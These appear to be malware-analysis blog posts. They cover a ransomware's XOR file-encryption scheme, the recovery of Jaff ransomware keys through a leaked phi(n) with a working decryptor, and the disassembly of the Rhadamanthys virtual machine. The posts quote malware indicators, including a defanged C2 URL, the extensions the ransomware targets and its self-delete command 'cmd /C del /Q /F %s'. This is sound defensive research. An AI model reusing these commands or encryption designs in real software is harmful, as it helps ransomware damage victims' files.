The encryption algorithm begins by randomly selecting two indices from the primary key. The program reads a stream of bytes from the primary key starting from these random indices, and each byte of the plaintext is XORed with the corresponding byte from both streams.
The two random indices can be determined based on the name of the encrypted file. The extension of the encrypted files is a base64 representation of a 32-byte number. The first 16 bytes are the MD5 hash of the primary key, indicating which key should be used for decryption. The second 16 bytes contain both indices concatenated together, represented as 64-bit little-endian integers.
The indices are generated as 64-bit integers, but in order to ensure that they are less than the size of the primary key, the first index is taken modulo 0x900000 and the second index is taken modulo 0x9ffc00.
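The layout described above can be unpacked with a few lines of Python. This is a sketch under assumptions rather than a tested parser for real samples: it assumes the standard base64 alphabet with the padding stripped, the function name parse_extension is hypothetical, and the extension it parses is fabricated on the spot purely to exercise the code.

```python
import base64
import struct

def parse_extension(extension):
    """Split the decoded extension into (key_hash, idx1, idx2)."""
    padded = extension + "=" * (-len(extension) % 4)   # restore stripped padding
    raw = base64.b64decode(padded)
    if len(raw) != 32:
        raise ValueError("expected 32 decoded bytes")
    key_hash = raw[:16]                                 # MD5 hash of the primary key
    raw_idx1, raw_idx2 = struct.unpack("<QQ", raw[16:]) # two 64-bit little-endian integers
    # reduce the raw values so that they fall inside the primary key
    return key_hash, raw_idx1 % 0x900000, raw_idx2 % 0x9ffc00

# Build a made-up extension to exercise the parser.
fake_hash = bytes(range(16))
fake_raw = fake_hash + struct.pack("<QQ", 0x900000 + 5, 0x9ffc00 * 3 + 7)
fake_extension = base64.b64encode(fake_raw).decode().rstrip("=")

key_hash, idx1, idx2 = parse_extension(fake_extension)
print(key_hash.hex(), hex(idx1), hex(idx2))
```

If a sample turns out to use the URL-safe alphabet instead, base64.urlsafe_b64decode can be swapped in without changing the rest of the function.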
During encryption, the first key never resets, even when bytes are skipped over during encryption. The second key resets every 0x400 bytes.
My attempt to replicate the encryption algorithm is shown below. This algorithm also functions as a decryption algorithm if the primary key is known, so I tested it by dumping the primary key from memory and using the script to decrypt an encrypted file.
import base64
def decrypt_with_primary(primary_name, filename):
    primary = open(primary_name, 'rb').read()
    ciphertext = open(filename, 'rb').read()
    # retrieve indices from base64-encoded strings in filename
    base64_str = filename.split('.')[1]
    short_key_bytes = base64.b64decode(base64_str + '==')[16:]
    key1 = short_key_bytes[0:8]
    key2 = short_key_bytes[8:16]
    # xor keys are offsets in the primary key
    idx1 = int.from_bytes(key1, 'little') % 0x900000
    idx2 = int.from_bytes(key2, 'little') % 0x9ffc00
    plaintext = b''
    # in larger files, leave some data unencrypted
    # (this simplified formula only matches get_skip_length for files under 0x20000 bytes)
    if(len(ciphertext) >= 0x2000):
        skip_len = (len(ciphertext) % 0x1000) // (len(ciphertext) // 0x1000 - 1)
    else: skip_len = 0
    block_len = 0x1000 + skip_len
    for j in range(len(ciphertext) // block_len + 1):
        pos = block_len*j
        # decrypt at most 0x1000 bytes, stopping at the end of the file
        for i in range(pos, min(pos+0x1000, len(ciphertext))):
            plain = bytes([ciphertext[i] ^ primary[idx1 + i] ^ primary[idx2 + i%0x400]])
            plaintext += plain
        # copy the skipped bytes through unchanged
        plaintext += ciphertext[pos+0x1000:pos+block_len]
    return plaintext
Unfortunately, I haven’t yet been able to write a decryptor for this sample. There doesn’t seem to be any trace of the primary key left on the system after encryption is complete - the .key.hive
file is RSA encrypted, and the encrypted files contain no relevant information about the primary key.
My first thought was to use some kind of known-plaintext attack, but that’s unlikely to work very well, as each file is encrypted using two different offsets of the primary key. XORing the known plaintext with the encrypted data would give us the XOR of two indices of the primary key, but it’s highly unlikely that the same two indices were ever used to encrypt more than one file.
Strictly speaking, you wouldn’t necessarily need your known plaintext to use the exact same two indices as the encrypted file. Suppose you know that a byte in the ciphertext was XORed with indices A and B, so you need to know A XOR B. If you have a known plaintext that was XORed with index A and some other index C, then you know A XOR C. If you have another known plaintext that uses indices B and C, then you know B XOR C. This means you could recover the key you need by taking (A XOR C) XOR (B XOR C). In this way, you might be able to recover some data by “chaining together” keys from several known plaintexts.
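The identity behind this chaining idea is easy to check. In the sketch below, three random byte strings stand in for the key material at indices A, B, and C; all names are hypothetical and nothing here touches a real sample.

```python
import os

def xor_bytes(a, b):
    """XOR two equal-length byte strings."""
    return bytes(x ^ y for x, y in zip(a, b))

# Random stand-ins for the primary key bytes at three different indices.
key_a, key_b, key_c = os.urandom(16), os.urandom(16), os.urandom(16)

# What two known plaintexts would reveal: A XOR C and B XOR C.
a_xor_c = xor_bytes(key_a, key_c)
b_xor_c = xor_bytes(key_b, key_c)

# C cancels out, leaving the keystream A XOR B that we actually need.
recovered = xor_bytes(a_xor_c, b_xor_c)

target_plain = b"sixteen byte msg"
ciphertext = xor_bytes(target_plain, xor_bytes(key_a, key_b))
decrypted = xor_bytes(ciphertext, recovered)
print(decrypted)
```

The same cancellation works over longer chains, since every intermediate index that appears twice drops out of the XOR.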
However, this strategy would likely be impractical in the vast majority of cases. You would need a huge amount of known plaintext in order to have a chance at getting the combination of indices you need. Additionally, you’d likely have to XOR thousands of known plaintexts together each time you needed to recover a key, so this method might only be a marginal improvement over brute force.
Recently, I’ve been trying to learn more about reverse engineering ransomware. Jaff is ransomware from a campaign dating back to 2017, and I was told that it had a vulnerability that would make it possible to write a decryptor. I analyzed a sample to see if I could rediscover the vulnerability myself.
You can find the sample I used on MalShare, and its SHA256 hash is 0746594fc3e49975d3d94bac8e80c0cdaa96d90ede3b271e6f372f55b20bac2f
.
The sample is a 32-bit PE executable written in C++. The executable did not seem to import any functions related to cryptography, and it contained a very long chunk of encrypted data. This meant that the most important functions of this program were likely being decrypted dynamically.
By setting breakpoints on VirtualAlloc
and VirtualProtect
, I kept track of each time a RWX segment of memory was allocated. After several calls to VirtualAlloc
and VirtualProtect
, the program wrote a PE file to one of these segments, which I dumped from memory. This turned out to be the actual encryptor, and it’s what I’ll be focusing on for the remainder of my analysis.
When run, the sample calls itself Ffv opg me liysj sfssezhz
:
Additionally, a GET request is made to fkksjobnn43[.]org/a5/
. As I don’t have access to this C2 server, I have no way of knowing what was expected from this server or whether the encryption process would have proceeded differently if I’d been able to connect.
The binary I dumped from memory imports cryptography-related functions such as CryptEncrypt
, CryptExportKey
, and CryptGenKey
, as well as file enumeration functions such as FindFirstFileW
and FindNextFileW
. This is how I knew I was looking at the actual encryptor.
Additionally, there were several resources containing data used in the encryption process:
#105
: The string representation of the numbers 35326054031861368139563306184134167018130718569482731666001650817539108744401016633231304437224730790638615766740272106403143256
and 35326054031861368139563306184134167018130718569482731666001650829864568371094444203557601170206844003631101722202233367975968667
.
#106
: The file extensions to encrypt:
.xlsx .acd .pdf .pfx .crt .der .cad .dwg .MPEG .rar .veg .zip .txt .jpg .doc .wbk .mdb .vcf .docx .ics .vsc .mdf .dsr .mdi .msg .xls .ppt .pps .obd .mpd .dot .xlt .pot .obt .htm .html .mix .pub .vsd .png .ico .rtf .odt .3dm .3ds .dxf .max .obj .7z .cbr .deb .gz .rpm .sitx .tar .tar.gz .zipx .aif .iff .m3u .m4a .mid .key .vib .stl .psd .ova .xmod .wda .prn .zpf .swm .xml .xlsm .par .tib .waw .001 .002 003. .004 .005 .006 .007 .008 .009 .010 .contact .dbx .jnt .mapimail .oab .ods .ppsm .pptm .prf .pst .wab .1cd .3g2 .7ZIP .accdb .aoi .asf .asp. aspx .asx .avi .bak .cer .cfg .class .config .css .csv .db .dds .fif .flv .idx .js .kwm .laccdb .idf .lit .mbx .md .mlb .mov .mp3 .mp4 .mpg .pages .php .pwm .rm .safe .sav .save .sql .srt .swf .thm .vob .wav .wma .wmv .xlsb .aac .ai .arw .c .cdr .cls .cpi .cpp .cs .db3 .docm .dotm .dotx .drw .dxb .eps .fla .flac .fxg .java .m .m4v .pcd .pct .pl .potm .potx .ppam .ppsx .ps .pspimage .r3d .rw2 .sldm .sldx .svg .tga .wps .xla .xlam .xlm .xltm .xltx .xlw .act .adp .al .bkp .blend .cdf .cdx .cgm .cr2 .dac .dbf .dcr .ddd .design .dtd .fdb .fff .fpx .h .iif .indd .jpeg .mos .nd .nsd .nsf .nsg .nsh .odc .odp .oil .pas .pat .pef .ptx .qbb .qbm .sas7bdat .say .st4 .st6 .stc .sxc .sxw .tlg .wad .xlk .aiff .bin .bmp .cmt .dat .dit .edb .flvv .gif .groups .hdd .hpp .log .m2ts .m4p .mkv .ndf .nvram .ogg .ost .pab .pdb .pif .qed .qcow .qcow2 .rvt .st7 .stm .vbox .vdi .vhd .vhdx .vmdk .vmsd .vmx .vmxf .3fr .3pr .ab4 .accde .accdt .ach .acr .adb .srw .st5 .st8 .std .sti .stw .stx .sxd .sxg .sxi .sxm .tex .wallet .wb2 .wpd .x11 .x3f .xis .ycbcra .qbw .qbx .qby .raf .rat .raw .rdb rwl .rwz .s3db .sd0 .sda .sdf .sqlite .sqlite3 .sqlitedb .sr .srf .oth .otp .ots .ott .p12 .p7b .p7c .pdd .pem .plus_muhd .plc .pptx .psafe3 .py .qba .qbr.myd .ndd .nef .nk .nop .nrw
#109
: The ransom note in HTML form, with the string [ID5]
in place of the victim’s decryption ID.
#110
: The string .jaff
, which is the extension appended to encrypted files.
#111
: The URL fkksjobnn43[.]org/a5/
.
#112
: The ransom note in text form, again with [ID5]
in place of the ID.
#113
: A string of bytes which, when XORed with the second number in #105
, gives the strings ReadMe.txt
, ReadMe.bmp
, and ReadMe.html
.
Additionally, the string cmd /C del /Q /F %s
found in the program suggests that it is intended to delete itself once encryption is complete.
The sample uses 256-bit AES to encrypt files. For debugging purposes, I set a breakpoint on CryptImportKey
to read the key blob from memory:
A new key is generated using CryptGenKey
each time the program is run.
Beginning with the root directory, the program enumerates all files and subdirectories and uses CryptEncrypt
to AES encrypt each file. The program uses GetLogicalDrives
to find all drives connected to the system, and encrypts all drives that are not CD-ROM drives (possibly because a CD-ROM drive would make a noticeable noise as it started up).
The .jaff
extension is appended to the encrypted file, and the AES-encrypted bytes are written. We can see that there are multiple WriteFile
calls to the encrypted file, revealing that something else is appended to the .jaff
file before the encrypted data:
The appended value turned out to be the ASCII representation of a large number.
Additionally, the ransom note is dropped in each encrypted directory. The note is dropped in text, HTML, and image forms, with file names of ReadMe.txt
, ReadMe.html
, and ReadMe.bmp
respectively.
A new victim ID is generated each time the program is run.
I suspected that the long number appended before the encrypted data in the .jaff
files was likely an encryption of the AES key. A new AES key was generated for each victim, so the program would need some way to store it.
I found that the AES key was being passed as an argument to sub_402d70
. When passed into this function, the AES key blob was being stored as a decimal representation in little-endian format, with each decimal digit being stored as a 16-bit integer. Each byte of the key blob was converted to three decimal digits; for instance, 08
would be stored as 008
and 8A
would be stored as 138
. Additionally, the digit “1” was appended to the sequence:
For example, during one run of the program, the original AES key blob was the following:
08 02 00 00 10 66 00 00 20 00 00 00 52 8A A4 D0 46 E3 4F FE E8 C6 A0 F5 91 0C 25 81 03 0E 5C 3C 57 F6 A0 43 08 32 C9 83 2C 01 FC 95
It was stored as the sequence of bytes
04 00 04 00 00 00 01 00 03 00 01 00 01 00 00 00 02 00 00 00 05 00 00 00 08 00 00 00 00 00 07 00 06 00 00 00 00 00 06 00 01 00 06 00 04 00 02 00 07 00 08 00 00 00 00 00 06 00 00 00 02 00 09 00 00 00 04 00 01 00 00 00 03 00 00 00 00 00 09 00 02 00 01 00 07 00 03 00 00 00 02 00 01 00 00 00 05 00 04 00 01 00 05 00 04 00 02 00 00 00 06 00 01 00 08 00 09 00 01 00 02 00 03 00 02 00 04 00 05 00 02 00 09 00 07 00 00 00 07 00 02 00 02 00 00 00 07 00 00 00 08 00 00 00 02 00 04 00 06 00 01 00 08 00 03 00 01 00 02 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 01 00 06 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 00 00 08 00 00 00 00 00 01
which corresponds to the number
1008002000000016102000000032000000000082138164208070227079254232198160245145012037129003014092060087246160067008050201131044
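As a rough sketch of the storage format described above, the helper below turns such a buffer of 16-bit little-endian digits back into the decimal string. The name digits_to_decimal is my own and does not come from the sample, and I am assuming the least significant digit is stored first, which is what the dump above suggests.

```python
import struct

def digits_to_decimal(buf):
    """Decode 16-bit little-endian digits (least significant digit first)."""
    if len(buf) % 2:
        # tolerate a dump that cuts off the high byte of the final digit
        buf += b'\x00'
    digits = struct.unpack('<%dH' % (len(buf) // 2), buf)
    # the most significant digit is stored last, so reverse before joining
    return ''.join(str(d) for d in reversed(digits))

# the first six digits of the dump above
sample = bytes.fromhex('040004000000010003000100')
print(digits_to_decimal(sample))  # 131044, the last six digits of the number
```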
To convert this representation back into bytes, I used the following function:
def convert_from_decimal(s):
    result = b''
    # skip the leading "1" marker digit
    s_fixed = s[1:]
    # every group of three decimal digits encodes one byte
    for i in range(0, len(s_fixed), 3):
        curr_num = s_fixed[i:i+3]
        result += int(curr_num).to_bytes(1, 'little')
    return result
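For reference, here is a minimal sketch of the opposite direction. The function convert_to_decimal is hypothetical (I did not recover it from the sample); it only mirrors the format described above. My guess is that the leading 1 is there so that leading zero digits survive when the string is treated as a number.

```python
def convert_to_decimal(blob):
    """Encode bytes as a '1' marker followed by three decimal digits per byte."""
    return '1' + ''.join('%03d' % b for b in blob)

def convert_from_decimal(s):
    """Inverse of convert_to_decimal (same logic as the function above)."""
    body = s[1:]
    return bytes(int(body[i:i+3]) for i in range(0, len(body), 3))

# first eight bytes of the key blob shown earlier
header = bytes.fromhex('0802000010660000')
encoded = convert_to_decimal(header)
print(encoded)  # 1008002000000016102000000
assert convert_from_decimal(encoded) == header
```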
At this point, it was time to look at what sub_402d70
was actually doing. The arguments to the function were the AES key, an array of bytes that were either 1 or 0, and the decimal representation of the number 35326054031861368139563306184134167018130718569482731666001650829864568371094444203557601170206844003631101722202233367975968667
. Note that this is one of the two numbers that appeared in resource #105
.
By experimenting with this subroutine in a debugger, I found that the program was calling functions that performed multiplication and division on arbitrarily large numbers. Specifically, the AES key was being squared over and over, and something different was done with the result based on the values in the array of 1s and 0s.
This proved to be the repeated-squaring method for modular exponentiation. The AES key was being raised to an exponent, which was passed as an argument in binary form in order to aid in the repeated-squaring algorithm. The modulus was the long number stored in the resource.
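The general technique looks something like the sketch below. This is not a reconstruction of sub_402d70; in particular, the bit order (least significant bit first) and the function names are my assumptions.

```python
def modexp_bits(base, exp_bits_lsb_first, modulus):
    """Right-to-left repeated squaring driven by an array of exponent bits."""
    result = 1
    square = base % modulus
    for bit in exp_bits_lsb_first:
        if bit:
            # this bit of the exponent is set: fold the current power in
            result = (result * square) % modulus
        # square for the next bit regardless of its value
        square = (square * square) % modulus
    return result

def to_bits_lsb_first(e):
    """Expand an exponent into a list of 0/1 values, lowest bit first."""
    return [(e >> i) & 1 for i in range(e.bit_length())]

# sanity check against Python's built-in modular exponentiation
assert modexp_bits(1234, to_bits_lsb_first(65537), 99991) == pow(1234, 65537, 99991)
```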
The use of modular exponentiation immediately suggested that RSA was being used. Normally, this would mean we wouldn’t be able to decrypt the AES key, as we need the private key for that.
However, resource #105
contains two numbers, and we’ve only used one so far. One of them is the public modulus n, and the other number is very close to it. It seemed possible that the second number was phi(n), which is needed to compute the private exponent d from the public exponent e. I wrote the following script to test it:
def rsa_decrypt(msg, e, n, phi_n):
    # the private exponent is the inverse of e modulo phi(n)
    d = pow(e, -1, phi_n)
    return pow(msg, d, n)
Sure enough, passing in the second number as phi(n) returned the decrypted AES key! Since the RSA key was hard-coded, this meant that we had enough information to write a decryptor for any files encrypted with this sample, even if the AES key changed each time.
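To see why leaking phi(n) is fatal, here is a toy example with the small textbook primes 61 and 53 (not the sample's values). It also shows that n can be factored once phi(n) is known, since p + q = n - phi(n) + 1. The helper factor_from_phi is my own illustration and is not needed by the decryptor.

```python
from math import isqrt

def rsa_decrypt(msg, e, n, phi_n):
    d = pow(e, -1, phi_n)  # modular inverse; needs Python 3.8+
    return pow(msg, d, n)

def factor_from_phi(n, phi_n):
    # p + q = n - phi(n) + 1 and p * q = n, so p and q are the roots
    # of x^2 - (p + q) * x + n = 0
    s = n - phi_n + 1
    root = isqrt(s * s - 4 * n)
    return (s + root) // 2, (s - root) // 2

n, phi_n, e = 3233, 3120, 17      # toy key: n = 61 * 53
ciphertext = pow(65, e, n)        # "encrypt" the message 65
print(rsa_decrypt(ciphertext, e, n, phi_n))  # 65
print(factor_from_phi(n, phi_n))             # (61, 53)
```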
To generate the private exponent for the decryptor, I not only needed phi(n), but also the public exponent. However, the program generated a new public exponent each time it was run.
Upon closer inspection, I found that the public exponent was usually close to the victim ID given in the ransom note. Sometimes they matched exactly, but sometimes the exponent was slightly more than the ID, and occasionally they didn’t seem to match at all.
Eventually, I found that the victim ID seemed to be randomly generated. If a negative number was generated, the bits were negated in order to produce a positive result.
After correcting for this, I found that either the victim ID or its negation was always close to the exponent, but there didn’t seem to be much of a pattern to the exact difference.
It turned out that the victim ID sometimes needed to be modified before it could work as a public exponent. In RSA, the public exponent needs to be invertible modulo phi(n), meaning that the exponent and phi(n) need to be relatively prime. However, the process that generated the victim IDs did not guarantee a result that was relatively prime to phi(n).
(This is just speculation, but my guess is that this is why phi(n) was hard-coded in the executable - they needed to guarantee that they had a valid public exponent, so they had to check whether the ID and phi(n) were relatively prime. However, this also gives us enough information to decrypt the files ourselves!)
By incrementing the victim ID until I got a number that was relatively prime to phi(n), I managed to retrieve the public exponent.
import math

def get_relatively_prime(e, phi_n):
    # step through odd candidates until one is coprime to phi(n)
    while(math.gcd(e, phi_n) != 1):
        e += 2
    return e
We now have enough information to write a decryptor that decrypts the victim’s files using only the encrypted .jaff
file and the ID number in the ransom note.
import math
from struct import unpack
from Crypto.Cipher import AES

# phi(n) and the RSA modulus n, both hard-coded in resource #105
phi_n = 35326054031861368139563306184134167018130718569482731666001650817539108744401016633231304437224730790638615766740272106403143256
n = 35326054031861368139563306184134167018130718569482731666001650829864568371094444203557601170206844003631101722202233367975968667

def convert_from_decimal(s):
    result = b''
    # skip the leading "1" marker digit
    s_fixed = s[1:]
    for i in range(0, len(s_fixed), 3):
        curr_num = s_fixed[i:i+3]
        result += int(curr_num).to_bytes(1, 'little')
    return result

def rsa_decrypt(msg, e, n, phi_n):
    d = pow(e, -1, phi_n)
    return pow(msg, d, n)

def get_relatively_prime(e, phi_n):
    while(math.gcd(e, phi_n) != 1):
        e += 2
    return e

def aes_decrypt(ciphertext, blob):
    iv = b'\x00'*16
    # the first 12 bytes of the key blob are the header and key length
    key_bytes = blob[12:]
    key = AES.new(key_bytes, AES.MODE_CBC, iv)
    # zero-pad the ciphertext up to a multiple of the AES block size
    padded_text = ciphertext + b'\x00'*(-len(ciphertext) % 16)
    return key.decrypt(padded_text)

def decrypt(filename, id):
    # parse the encrypted AES key and data from the file
    with open(filename, 'rb') as f:
        enc_file = f.read()
    num_size = unpack('<I', enc_file[0:4])[0]
    key_str = enc_file[4:num_size+4]
    ciphertext = enc_file[num_size+8:]
    keys = [int(i) for i in key_str.split()]
    # test both the victim ID and its negation for a valid public exponent
    exp1 = get_relatively_prime(id | 1, phi_n)
    aes_key = [rsa_decrypt(k, exp1, n, phi_n) for k in keys]
    # a correctly decrypted key blob always starts with 08 02 00 ...
    if str(aes_key[0])[0:6] != '100800':
        not_id = ~id & 0xffffffff
        exp2 = get_relatively_prime(not_id | 1, phi_n)
        aes_key = [rsa_decrypt(k, exp2, n, phi_n) for k in keys]
    # decode the key blob from its decimal representation
    aes_key_bytes = b''
    for k in aes_key:
        aes_key_bytes += convert_from_decimal(str(k))
    return aes_decrypt(ciphertext, aes_key_bytes)
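The file layout that decrypt() relies on can be checked in isolation. The sketch below builds a synthetic buffer (made-up values, not a real .jaff file) and splits it the same way. The helper name split_jaff is mine, and I have not confirmed what the four skipped bytes mean.

```python
from struct import pack, unpack

def split_jaff(data):
    """Split a buffer into (RSA-encrypted key chunks, skipped bytes, ciphertext)."""
    num_size = unpack('<I', data[0:4])[0]        # length of the ASCII key string
    key_str = data[4:4 + num_size]               # whitespace-separated decimal numbers
    skipped = data[4 + num_size:8 + num_size]    # 4 bytes that decrypt() ignores
    ciphertext = data[8 + num_size:]
    keys = [int(k) for k in key_str.split()]
    return keys, skipped, ciphertext

# synthetic example with two fake key chunks and one block of fake ciphertext
fake_keys = b'12345 67890'
fake_file = pack('<I', len(fake_keys)) + fake_keys + b'\x10\x00\x00\x00' + b'A' * 16
print(split_jaff(fake_file))
```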
Rhadamanthys is an infostealer that has recently been spreading through malicious Google ads. The program decrypts several layers of shellcode before retrieving the second stage of its payload from its C2 server. This writeup provides an excellent explanation of the process, but I wanted to look more closely at the obfuscation methods used to hide the shellcode.
The sample I used in this writeup is available at MalwareBazaar here.
Looking at the strings in the sample, I immediately noticed a very long string beginning with 7ARQAAAASCI
. This string appears in every sample of Rhadamanthys I’ve seen so far.
Since the string contained only numbers and uppercase letters, I suspected that base32 was being used, but my attempts to decode the string as base32 failed. In the process of looking for a decryption function, I found what appeared to be operations associated with a virtual machine:
Upon closer inspection, I found what appeared to be the opcodes of the virtual machine in memory when this function was called, at an offset of 0xc
from the first argument. Each of the opcodes is stored as a value from 0 to 52, sometimes followed by a single operand in the form of a 32-bit integer.
The opcodes are also hard-coded in the memory of the program:
I found that there was a layer of obfuscation designed to obscure which opcodes corresponded to which operations. The program stores a table of 53 values:
[4203120, 4203138, 4203140, 4204027, 4204069, 4203673, 4204001, 4204014, 4203142, 4203215, 4204161, 4204224, 4204275, 4204326, 4204377, 4204428, 4204479, 4204530, 4204581, 4204632, 4204683, 4204734, 4204814, 4204894, 4204974, 4205054, 4205134, 4203405, 4203349, 4203294, 4203531, 4203495, 4203461, 4203565, 4203621, 4205770, 4205802, 4205214, 4205240, 4205275, 4205310, 4205346, 4205383, 4205419, 4205456, 4205492, 4205528, 4205563, 4205598, 4205633, 4205659, 4205696, 4205733]
When an instruction is run, the program retrieves the value stored at the index given by the opcode. A long switch statement then compares this value against the constant associated with each instruction.
For instance, the XOR instruction corresponds to a value of 0x402c1e
, which is at index 48 of the array. Therefore the opcode for XOR is 48.
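In other words, the lookup is a two-step mapping from opcode to table value to operation. A minimal sketch using three entries from the table above (the dictionary names are mine):

```python
# excerpt of the 53-entry table: opcode -> value compared in the switch statement
TABLE_EXCERPT = {46: 4205528, 47: 4205563, 48: 4205598}
# operations I identified for those values
OPERATION_NAMES = {4205528: 'and', 4205563: 'or', 4205598: 'xor'}

def opcode_name(opcode):
    value = TABLE_EXCERPT[opcode]
    return OPERATION_NAMES.get(value, '?')

print(hex(TABLE_EXCERPT[48]), opcode_name(48))  # 0x402c1e xor
```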
There are 53 different opcodes, though some of them appear to be duplicates. There were a few instructions I wasn’t able to figure out (especially the ones related to manipulation of floating-point values). These are marked with a ?
in the disassembly script below. If I have time later, I may go back and figure out what these instructions are.
The virtual machine is stack-based, with most operations acting on the top of the stack and the value directly below it. We have the option to push immediate values (push_imm
) or values at a memory address relative to a given offset (push_indirect
).
Some of the opcodes call other functions in the program. Most importantly, the instruction I refer to as get string
in the disassembly retrieves a sequence of bytes from the long, seemingly base32-encoded string I mentioned earlier.
The script I used to disassemble the instructions is given below:
import binascii

# value stored in the table for each opcode (index in the table = opcode)
op_dict = {0: 4203120, 1: 4203138, 2: 4203140, 3: 4204027, 4: 4204069, 5: 4203673, 6: 4204001, 7: 4204014, 8: 4203142, 9: 4203215, 10: 4204161, 11: 4204224, 12: 4204275, 13: 4204326, 14: 4204377, 15: 4204428, 16: 4204479, 17: 4204530, 18: 4204581, 19: 4204632, 20: 4204683, 21: 4204734, 22: 4204814, 23: 4204894, 24: 4204974, 25: 4205054, 26: 4205134, 27: 4203405, 28: 4203349, 29: 4203294, 30: 4203531, 31: 4203495, 32: 4203461, 33: 4203565, 34: 4203621, 35: 4205770, 36: 4205802, 37: 4205214, 38: 4205240, 39: 4205275, 40: 4205310, 41: 4205346, 42: 4205383, 43: 4205419, 44: 4205456, 45: 4205492, 46: 4205528, 47: 4205563, 48: 4205598, 49: 4205633, 50: 4205659, 51: 4205696, 52: 4205733}
# instructions that are followed by a 32-bit operand
has_operand = [4203142, 4203215, 4203565, 4203621, 4206427, 4204224, 4204275, 4204326, 4204377, 4204428, 4204479, 4204530, 4204581, 4204632, 4204683, 4204734, 4204814, 4204894, 4204974, 4205054, 4205134, 4204069, 4204027]
# names of the instructions identified so far; '?' marks the unknown ones
# (the key for 'jbe? [float]' is 4205054, the value at index 25 of the table)
insn_names = {4203120: 'halt', 4203140: 'nop', 4203142: 'push_imm', 4203215: 'push_indirect', 4203294: 'load', 4203349: 'load', 4203405: 'load', 4203495: 'pop word', 4203461: 'pop dword', 4203531: 'pop byte', 4203565: 'pop_indirect', 4204101: 'call sub_402e1d', 4203673: 'get string', 4204001: '?', 4204014: 'pop', 4204027: '?', 4204069: '?', 4204161: '?', 4204224: 'jeq', 4204275: 'jne', 4204326: 'jl', 4204377: 'jle', 4204428: 'jg', 4204479: 'jge', 4204530: 'jl', 4204581: 'jle', 4204632: 'jg', 4204683: 'jge', 4204734: 'jne? [float]', 4204814: 'je? [float]', 4204894: 'jae? [float]', 4204974: 'ja? [float]', 4205054: 'jbe? [float]', 4205134: 'jb? [float]', 4205214: 'not', 4205240: 'add', 4205275: 'sub', 4205310: 'divs', 4205346: 'divu', 4205383: 'mods', 4205419: 'modu', 4205456: 'mul', 4205492: 'mul', 4205528: 'and', 4205563: 'or', 4205598: 'xor', 4205633: 'not', 4205659: 'shl', 4205696: 'asr', 4205733: 'lsr', 4205770: '?', 4205802: '?'}

def get_op_name(n):
    return insn_names[op_dict[n]]

# the opcode stream is a hex dump of 32-bit little-endian words
insns_hex = open('ops_hexdump.txt').read().replace(' ','')
insns = []
full_str = ''
has_operand_flag = False
for i in range(0, len(insns_hex), 8):
    insn_str = insns_hex[i:i+8]
    insn = int.from_bytes(binascii.unhexlify(insn_str), 'little')
    if(has_operand_flag):
        # this word is the operand of the previous instruction
        full_str += hex(insn)
        print(full_str)
        full_str = ''
        has_operand_flag = False
    else:
        try:
            addr = op_dict[insn]
            # prefix each instruction with its word offset in the stream
            full_str += hex(i // 8) + ' ' + get_op_name(insn) + ' '
            if addr in has_operand:
                has_operand_flag = True
            else:
                print(full_str)
                full_str = ''
        except KeyError:
            # not a known opcode, or an opcode without a name yet
            print('bad', insn_str)
Looking at the disassembly, we can see the program construct several interesting strings. This sequence of instructions loads the string kernel32.dll
into memory:
0x26b push_indirect 0x18
0x26d push_imm 0x6b
0x26f pop byte
0x270 push_indirect 0x19
0x272 push_imm 0x65
0x274 pop byte
0x275 push_indirect 0x1a
0x277 push_imm 0x72
0x279 pop byte
...
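To make the pattern concrete, here is a tiny emulation of just these three instructions. This is my simplified reading of their semantics rather than a faithful model of the VM: I assume push_indirect pushes an address (the base plus the operand), push_imm pushes a constant, and pop byte pops a value and an address and stores the low byte at that address.

```python
def run(program, memory):
    """Emulate push_indirect / push_imm / pop byte on a flat bytearray."""
    stack = []
    for op, arg in program:
        if op == 'push_indirect':
            stack.append(arg)            # assumed: address = base (0 here) + operand
        elif op == 'push_imm':
            stack.append(arg)
        elif op == 'pop byte':
            value = stack.pop()
            addr = stack.pop()
            memory[addr] = value & 0xff  # store a single byte
    return memory

program = [
    ('push_indirect', 0x18), ('push_imm', 0x6b), ('pop byte', None),
    ('push_indirect', 0x19), ('push_imm', 0x65), ('pop byte', None),
    ('push_indirect', 0x1a), ('push_imm', 0x72), ('pop byte', None),
]
memory = run(program, bytearray(0x20))
print(bytes(memory[0x18:0x1b]))  # b'ker'
```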
Later on, the same process is used to build the strings 41 ? 76 ? 61 ? 73 ? 74
and 73 ? 6E ? 78 ? 68 ? 6B
. The hexadecimal values in these strings spell out Avast
and snxhk
respectively. Some googling reveals that snxhk
is the name of a DLL associated with Avast antivirus. Presumably this means that the program is attempting to evade antivirus, but so far I haven’t looked into the specifics of how it does so.
Eventually, I managed to find something that looked like base32 decoding. This comparison loads a character and checks whether it is between A
and Z
:
0x624 load
0x625 push_imm 0x41
0x627 jl 0x639
0x629 push_indirect 0xc
0x62b load
0x62c push_imm 0x5a
0x62e jg 0x639
And this comparison checks for a character between 4
and 9
:
0x641 load
0x642 push_imm 0x34
0x644 jl 0x659
0x646 push_indirect 0x10
0x648 load
0x649 push_imm 0x39
0x64b jg 0x659
This explains why attempting to decode the base32 earlier failed: the program is using the alphabet [A-Z][4-9]
, rather than the more conventional [A-Z][2-7]
.
There’s still one more step we have to go through before we can decode the long string. The long string contains several sequences of the characters 0
, 1
, and 2
, which aren’t part of the base32 character set that’s being used here.
It may be that these sequences are being used to encode information in a different way, but it’s entirely possible that they’re just there to make it harder to identify the alphabet being used for the base32 encoding. I replaced them all with the character A
before decoding.
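A minimal sketch of the decoding step, using Python's base64 module. I am assuming that the custom alphabet keeps the usual ordering (A-Z for values 0 to 25, then 4-9 for values 26 to 31), so it can be translated character by character into the standard alphabet. The encoder is only there to produce test input.

```python
import base64

CUSTOM = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ456789'
STANDARD = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ234567'
# map the custom alphabet onto the standard one, and 0/1/2 onto 'A'
TO_STANDARD = str.maketrans(CUSTOM + '012', STANDARD + 'AAA')
FROM_STANDARD = str.maketrans(STANDARD, CUSTOM)

def decode_custom_base32(s):
    translated = s.translate(TO_STANDARD)
    # b32decode expects '=' padding up to a multiple of 8 characters
    translated += '=' * (-len(translated) % 8)
    return base64.b32decode(translated)

def encode_custom_base32(data):
    """Demo helper: standard base32 with the custom alphabet swapped in."""
    return base64.b32encode(data).decode().rstrip('=').translate(FROM_STANDARD)

encoded = encode_custom_base32(b'hello world')
assert decode_custom_base32(encoded) == b'hello world'
```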
At this point, we finally have our result:
We can see that this is the shellcode that’s being run in the second stage of the program.
